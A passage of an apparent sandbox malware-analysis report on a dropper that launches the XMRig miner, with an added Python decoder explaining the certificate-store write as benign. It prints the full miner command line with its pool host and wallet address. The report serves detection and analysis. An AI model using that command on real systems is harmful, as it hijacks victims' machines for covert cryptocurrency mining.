memory/2252-74-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-75-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-76-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-77-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-78-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-79-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-80-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-81-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-82-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-83-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-84-0x00007FF784160000-0x00007FF784C63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
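What the Blob value in the "Modifies system certificate store" rows actually contains, as an added example (our code, not part of the Triage report and not XMRig code): a decoder for the serialized certificate-context format Windows keeps under SystemCertificates\...\Blob, run on the value the report shows being written in behavioral9 and behavioral14. The thumbprint in the key name, D1EB23A46D17D68FD92564C2F1F1601764D8E349, the friendly name "Sectigo (AAA)" and the subject CN "AAA Certificate Services" recovered from the blob identify the public Comodo/Sectigo root that ships in Microsoft's trusted root program. AuthRoot\Certificates is the cache that Windows' automatic root update fills on first use, and the write is attributed to the dropper because CryptoAPI performs it inside the process that opened the TLS connection (the network tables show the sample fetching from github.com and objects.githubusercontent.com). On its own, then, this signature does not show a rogue root being trusted; what a responder should check is whether the thumbprint is a Microsoft-program root and whether the stored hashes match the embedded certificate, which the code below does. The property-ID names follow wincrypt.h; the reading of properties 0x53 and 0x62 as root-program metadata is ours.

```python
"""Decode the CERT_* property stream Windows keeps in
HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\<SHA-1>\\Blob.
Added example, not part of the sandbox report: BLOB_HEX is the value the report shows
being written; the parser and the checks around it are ours."""
import hashlib
import struct

PROP_NAMES = {  # wincrypt.h CERT_*_PROP_ID values present in this blob
    0x03: "SHA1_HASH", 0x09: "ENHKEY_USAGE", 0x0B: "FRIENDLY_NAME", 0x0F: "SIGNATURE_HASH",
    0x14: "KEY_IDENTIFIER", 0x19: "SUBJECT_PUBLIC_KEY_MD5_HASH", 0x1D: "SUBJECT_NAME_MD5_HASH",
    0x20: "CERT", 0x53: "ROOT_PROGRAM_CERT_POLICIES", 0x62: "AUTH_ROOT_SHA256_HASH",
}
# Issuer and subject of the embedded certificate are the same name:
# C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services
NAME_HEX = "".join([
    "307b310b3009060355040613024742",
    "311b301906035504080c1247726561746572204d616e63686573746572",
    "3110300e06035504070c0753616c666f7264",
    "311a3018060355040a0c11436f6d6f646f204341204c696d69746564",
    "3121301f06035504030c18414141204365727469666963617465205365727669636573",
])
CERT_HEX = "".join([  # the DER certificate carried in property 0x20 (1078 bytes)
    "308204323082031aa003020102020101300d06092a864886f70d0101050500", NAME_HEX,
    "301e170d3034303130313030303030305a170d3238313233313233353935395a", NAME_HEX,
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100",
    "be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d",  # RSA-2048 modulus
    "508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eea",
    "f115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f",
    "68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a8",
    "91c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb",
    "142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd9",
    "42e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7",
    "629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc9",
    # exponent 65537, then subject key id, key usage, basicConstraints CA:TRUE, CRL DPs
    "0203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4",
    "300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff",
    "307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f",
    "63612e636f6d2f414141436572746966696361746553657276696365732e63726c",
    "3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141",
    "436572746966696361746553657276696365732e63726c",
    "300d06092a864886f70d01010505000382010100",  # sha1WithRSAEncryption, 256-byte signature
    "0856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8",
    "e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f",
    "5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06a",
    "c3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de5340",
    "6c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec",
    "9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74",
    "d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981",
    "b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e",
])
BLOB_HEX = "".join([  # (prop_id, reserved, length, data) records as stored in the registry
    "1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2",
    "030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349",
    "1d00000001000000100000002e0d6875874a44c820912e85e964cfdb",
    "140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4",
    "0b000000010000001c0000005300650063007400690067006f002000280041004100410029000000",
    "620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4",
    "53000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c",
    "0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0",
    "090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a",
    "030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106",
    "082b06010505070308",
    "0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286",
    "200000000100000036040000", CERT_HEX,
])


def parse_blob(blob: bytes) -> dict:
    """Records are little-endian (DWORD prop_id, DWORD reserved == 1, DWORD length, data).
    A record that runs past the buffer is kept and flagged instead of raising, because
    exported blobs are often cut off, as the report's first Set value row is."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"not a certificate property record at offset {off}")
        data = blob[off + 12:off + 12 + length]
        props[prop_id] = {"data": data, "truncated": len(data) < length}
        off += 12 + length
    return props


def common_name(cert: bytes) -> str:
    """First CN (OID 2.5.4.3 as UTF8String) in the DER; enough here, no full ASN.1 walk."""
    i = cert.find(b"\x06\x03\x55\x04\x03\x0c")
    return cert[i + 7:i + 7 + cert[i + 6]].decode() if i >= 0 else ""


def inspect_blob(blob_hex: str) -> dict:
    """Identify the certificate and check the stored hashes against the embedded DER."""
    props = parse_blob(bytes.fromhex(blob_hex))
    cert = props[0x20]["data"]
    return {
        "props": [PROP_NAMES.get(p, hex(p)) for p in sorted(props)],
        "friendly_name": props[0x0B]["data"].decode("utf-16-le").rstrip("\x00"),
        "common_name": common_name(cert),
        "cert_len": len(cert),
        "cert_truncated": props[0x20]["truncated"],
        "stored_sha1": props[0x03]["data"].hex(),
        "sha1_matches": props[0x03]["data"].hex() == hashlib.sha1(cert).hexdigest(),
        "sha256_matches": props[0x62]["data"].hex() == hashlib.sha256(cert).hexdigest(),
        # 0x53/0x62 are copied from Microsoft's authroot CTL by the automatic root update;
        # a root added by hand (certutil -addstore) normally lacks them
        "has_ctl_metadata": 0x53 in props and 0x62 in props,
    }
```

On a live host the same value can be read with PowerShell (Get-ItemProperty on the registry key, then $_.Blob) and fed to inspect_blob as hex; a thumbprint that is not in Microsoft's root program, a missing friendly name, or a stored hash that does not match the embedded DER is what would turn this signature from noise into evidence.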
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4120 wrote to memory of 2804 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4120 wrote to memory of 2804 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2804-16-0x000001BABCE30000-0x000001BABCE50000-memory.dmp
memory/2804-17-0x000001BABCE80000-0x000001BABCEA0000-memory.dmp
memory/2804-18-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-20-0x000001BABCEA0000-0x000001BABCEC0000-memory.dmp
memory/2804-19-0x000001BABE770000-0x000001BABE790000-memory.dmp
memory/2804-21-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-22-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-25-0x000001BABCEA0000-0x000001BABCEC0000-memory.dmp
memory/2804-24-0x000001BABE770000-0x000001BABE790000-memory.dmp
memory/2804-23-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-26-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-27-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-28-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-29-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-30-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-31-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-32-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-33-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-34-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-35-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-36-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-37-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-38-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-39-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-40-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-41-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-42-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-43-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-44-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-45-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-46-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-47-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-48-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-49-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-50-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-51-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-52-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-53-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-54-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-55-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-56-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-57-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-58-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-59-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-60-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-61-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-62-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-63-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-64-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-65-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-66-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-67-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-68-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-69-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-70-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-71-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-72-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-73-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-74-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-75-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-76-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-77-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-78-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-79-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-80-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-81-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-82-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-83-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-84-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:33
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2684 wrote to memory of 1044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2684 wrote to memory of 1044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.167.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1044-16-0x0000024836980000-0x00000248369A0000-memory.dmp
memory/1044-17-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-18-0x0000024836BE0000-0x0000024836C00000-memory.dmp
memory/1044-19-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-21-0x0000024836C20000-0x0000024836C40000-memory.dmp
memory/1044-20-0x0000024836C00000-0x0000024836C20000-memory.dmp
memory/1044-22-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-23-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-24-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-25-0x0000024836C00000-0x0000024836C20000-memory.dmp
memory/1044-26-0x0000024836C20000-0x0000024836C40000-memory.dmp
memory/1044-27-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-28-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-29-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-30-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-31-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-32-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-33-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-34-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-35-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-36-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-37-0x00007FF653D20000-0x00007FF654823000-memory.dmp
